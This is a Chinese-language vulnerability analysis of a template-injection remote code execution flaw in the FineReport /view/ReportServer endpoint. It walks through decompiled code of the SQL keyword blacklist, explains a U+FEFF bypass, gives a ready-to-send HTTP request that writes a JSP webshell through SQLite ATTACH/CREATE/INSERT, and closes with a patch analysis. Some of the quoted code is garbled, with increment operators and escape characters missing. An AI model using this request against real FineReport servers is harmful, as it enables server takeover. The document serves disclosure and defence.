帆软/view/ReportServer 远程代码执行漏洞分析

2024-08-09 14:09:53 浏览数 (2)

漏洞简介

漏洞描述: FinеRероrt 是帆软自主研发的企业级 Wеb 报表工具。其/view/ReportServer接口存在模版注入漏洞,攻击者可以利用该漏洞执行任意SQL写入Webshell,从而获取服务器权限。 影响范围: 1)JAR包时间在 2024-07-23 之前的FineReport11.*、10.*系列 2)JAR包时间在 2024-07-24 之前的、运维平台或Tomcat部署包部署的FineBI全版本 3)JAR包时间在 2024-07-24 之前的FineDataLink全版本

环境搭建

环境下载:https://www.finereport.com/product/download/redirect?version=windows_x64_10.0&token=BKi7fGzRzhfm 环境版本:10.0.19 远程调试:在FineReport_10.0bindesigner.vmoptions文件最后一行添加: -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005 保存后重启designer.exe,如果需要进一步调试,需要重新编译class文件替换回对应jar包。 登录界面:

漏洞分析

定位到漏洞入口com.fr.web.controller.ReportRequestCompatibleService#preview

使用内置的模版引擎TemplateUtils解析了用户请求传入的查询字符串(URL中?后的内容),这里的var1.getQueryString()获取的是Tomcat对字符串进行URL解码前的内容。而在进行模版引擎解析时可以调用一些特定的函数(均继承了抽象类com.fr.script.AbstractFunction),如下

关于函数的使用可参考官方手册:常用函数概述 - FineBI帮助文档 (fanruan.com)

其中内置函数包括了com.fr.function.SQL,在进行模板解析时run方法会作为函数执行的入口

该函数允许传入一个数组Object[],连接Object[0]数据库后,执行Object[1]SQL,而帆软报表默认使用Sqlite作为数据库引擎,并且默认存在数据库FRDemo,所以可以构造如下payload执行任意SQL

代码语言:javascript复制
${sql('FRDemo',DECODE('SELECT 'qyg123456';'),1,1)}
//由于Tomcat传参问题,这里需要借助DECODE函数进行URL解码,解码后为SELECT 'qyg123456';

值得注意的是,在执行SQL前,会调用JDBCSecurityChecker.checkQuery方法对SQL进行安全检查

跟进checkQuery方法

该方法做了一个黑名单检测,如果匹配到InsecurityElement对应的关键字,则报错退出。关键字如下

跟进InsecurityElement.probed方法查看匹配逻辑

this.removeSpecialCharacters(this.ignoreQuotesAndNotes(var1.toLowerCase()))会对SQL字符串做一些处理,涉及的方法如下:

代码语言:javascript复制
private String ignoreQuotesAndNotes(String var1) {
    StringBuilder var2 = new StringBuilder();
    char var3 = '0';
    boolean var4 = false;
    int var5 = 0;

    while(true) {
        while(var5 < var1.length()) {
            char var6 = var1.charAt(var5);
            if (this.isQuote(var3)) {
                if (var6 == var3) {
                    var3 = '0';
                    var2.append(" ");
                }

                  var5;
            } else if (var4) {
                if (var4) {
                    if (var6 == 'n') {
                        var4 = false;
                        var2.append(" ");
                    }
                } else if (var5   1 < var1.length() && var1.charAt(var5) == '*' && var1.charAt(var5   1) == '/') {
                    var4 = false;
                    var2.append(" ");
                      var5;
                }

                  var5;
            } else {
                if (var5   1 < var1.length()) {
                    if (var1.charAt(var5) == '-' && var1.charAt(var5   1) == '-') {
                        var4 = true;
                        var2.append(" ");
                        var5  = 2;
                        continue;
                    }

                    if (var1.charAt(var5) == '/' && var1.charAt(var5   1) == '*') {
                        var4 = true;
                        var2.append(" ");
                        var5  = 2;
                        continue;
                    }
                }

                if (this.isQuote(var6)) {
                    var2.append(" ");
                    var3 = var6;
                      var5;
                } else {
                    var2.append(var6);
                      var5;
                }
            }
        }

        return var2.toString();
    }
}
代码语言:javascript复制
private String removeSpecialCharacters(String var1) {
    StringBuilder var2 = new StringBuilder();

    for(int var3 = 0; var3 < var1.length();   var3) {
        char var4 = this.isSpecialCharacter(var1.charAt(var3)) ? 32 : var1.charAt(var3);
        var2.append(var4);
    }

    return var2.toString();
}
代码语言:javascript复制
private boolean isSpecialCharacter(char var1) {
    return var1 == ',' || var1 == 'n' || var1 == ';' || var1 == 't' || var1 == 'r' || var1 == 'f' || var1 == 11;
}

代码不难理解,组合起来就是先去除了SQL里的字符串和注释内容,再去除, n ; t r f 11(ASCII)这些特殊字符,最后返回SQL的关键字。接着再根据var2.contains(" " this.getPattern() " ")检测关键字。而如果需要通过sqlite写Webshell,则需要用到attach、create和insert语句,这些语句刚好全在黑名单里,所以需要绕过黑名单检测。根据Y4TACKER师傅的文章,其实这里使用了sqlite的一个小trick,参考https://android.googlesource.com/platform//external/sqlite/ /d11514d85b96ef33b1a78080246df7df2cf5d9ea/dist/orig/sqlite3.h, 底层代码在执行SQL前,如果SQL第一个字符存在U FEFF,那么这个字符将被移除

至此,我们可以通过在SQL前添加U FEFF字符(URL编码为),从而绕过黑名单的限制

漏洞复现

代码语言:javascript复制
GET /webroot/decision/view/ReportServer?${sql('FRDemo',DECODE('ATTACH DATABASE '../webapps/webroot/myqyg.jsp' as qyg;'),1,1)}${sql('FRDemo',DECODE('CREATE TABLE qyg.exp(data text);'),1,1)}${sql('FRDemo',DECODE('INSERT INTO qyg.exp(data) VALUES (x'717967717967717967717967717967717967717967');'),1,1)} HTTP/1.1
Host: 192.168.120.231:8075
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.54
Connection: close

访问/webroot/myqyg.jsp

这里得吐槽一下,Windows上装的帆软环境无法解析jsp文件,因为安装包的jasper依赖被修改删除过...

补丁分析

全版本补丁汇总:https://help.fanruan.com/finereport/doc-view-4658.html FineReport10补丁:https://fine-build.oss-cn-shanghai.aliyuncs.com/hw/FR/finereport10.0_jar_openjdk1.8.zip 针对漏洞的修复主要有两处地方:

  1. com.fr.web.controller.ReportRequestCompatibleService#preview

/view/ReportServer接口将不会对用户传入的查询字符串进行模版解析。 com.fr.data.core.db.JDBCSecurityChecker$InsecuritySQLKeyword#probed

this.regPattern.matcher(tmp).find()代替了原本的contains方法,通过正则匹配黑名单的关键字,从根源上修复了文件写入的操作。

参考链接

https://ti.qianxin.com/vulnerability/detail/360590 https://help.fanruan.com/finereport/doc-view-4833.html https://y4tacker.github.io/2024/07/23/year/2024/7/某软Report高版本中利用的一些细节

0 人点赞